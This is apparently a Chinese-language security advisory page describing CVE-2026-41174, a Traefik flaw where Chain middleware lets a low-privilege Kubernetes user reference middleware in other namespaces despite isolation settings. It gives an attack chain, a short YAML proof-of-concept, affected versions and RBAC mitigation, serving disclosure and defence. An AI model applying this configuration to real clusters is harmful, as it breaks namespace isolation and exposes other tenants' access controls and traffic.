IPBUF安全漏洞报告
English
CVE-2026-41174 CVSS 6.4 中危

CVE-2026-41174 Traefik跨命名空间隔离绕过漏洞

披露日期: 2026-04-30

漏洞信息

漏洞编号
CVE-2026-41174
漏洞类型
权限绕过
CVSS评分
6.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Traefik

相关标签

权限绕过TraefikKubernetes容器安全CVE-2026-41174

漏洞概述

Traefik在Kubernetes CRD提供商的跨命名空间隔离控制中存在安全漏洞。当配置禁止跨命名空间引用时,虽然直接引用会被拒绝,但攻击者可以通过Chain中间件的嵌套引用绕过限制。拥有低权限的攻击者可利用此漏洞解析并应用其他命名空间的中间件对象,导致隔离边界失效,影响机密性和完整性。

技术细节

该漏洞源于Traefik在处理Kubernetes CRD资源时的逻辑缺陷。具体而言,当`providers.kubernetesCRD.allowCrossNamespace`设置为false以强制执行命名空间隔离时,Traefik会检查`IngressRoute`对象是否直接引用了其他命名空间的中间件,若是则拒绝。然而,系统未能对`Chain`中间件资源内部的`spec.chain.middlewares`字段进行同样的校验。攻击者只需具备在自己命名空间内创建或更新Traefik CRD的权限,即可构造恶意的Chain对象,在链中引用目标命名空间的敏感中间件。当Traefik处理该IngressRoute时,会解析Chain并加载被引用的跨命名空间中间件,从而绕过了Kubernetes原生的命名空间隔离机制,导致未经授权的访问控制或流量劫持。

攻击链分析

STEP 1
侦察
攻击者确认目标命名空间中存在敏感的Traefik中间件对象(如身份验证或重写规则)。
STEP 2
准备
攻击者在自己的命名空间中创建一个自定义的`Chain`中间件,并在其`spec.chain.middlewares`字段中引用目标命名空间的敏感中间件。
STEP 3
执行
攻击者创建或更新一个`IngressRoute`对象,引用刚才创建的恶意`Chain`中间件。
STEP 4
利用
Traefik处理请求时解析`IngressRoute`,进而解析`Chain`,最终加载并应用了跨命名空间的中间件,导致隔离失效。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC: Exploiting Traefik Chain Middleware Bypass # Assumption: 'sensitive-middleware' exists in 'target-namespace' # Attacker creates resources in 'attacker-namespace' apiVersion: traefik.containo.us/v1alpha1 kind: Middleware metadata: name: malicious-chain namespace: attacker-namespace spec: chain: middlewares: - name: sensitive-middleware namespace: target-namespace # Bypassing isolation here --- apiVersion: traefik.containo.us/v1alpha1 kind: IngressRoute metadata: name: ingress-route-poc namespace: attacker-namespace spec: entryPoints: - web routes: - match: Host(`example.com`) kind: Rule services: - name: service-name port: 80 middlewares: - name: malicious-chain

影响范围

Traefik < 2.11.43
Traefik >= 3.0.0, < 3.6.14
Traefik 3.7.0-rc.1

防御指南

临时缓解措施
如果无法立即升级,应严格审查Kubernetes RBAC权限,限制普通用户在非受控命名空间中创建或修改Traefik自定义资源(CRD)的权限,特别是`Middleware`和`IngressRoute`资源的创建权。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表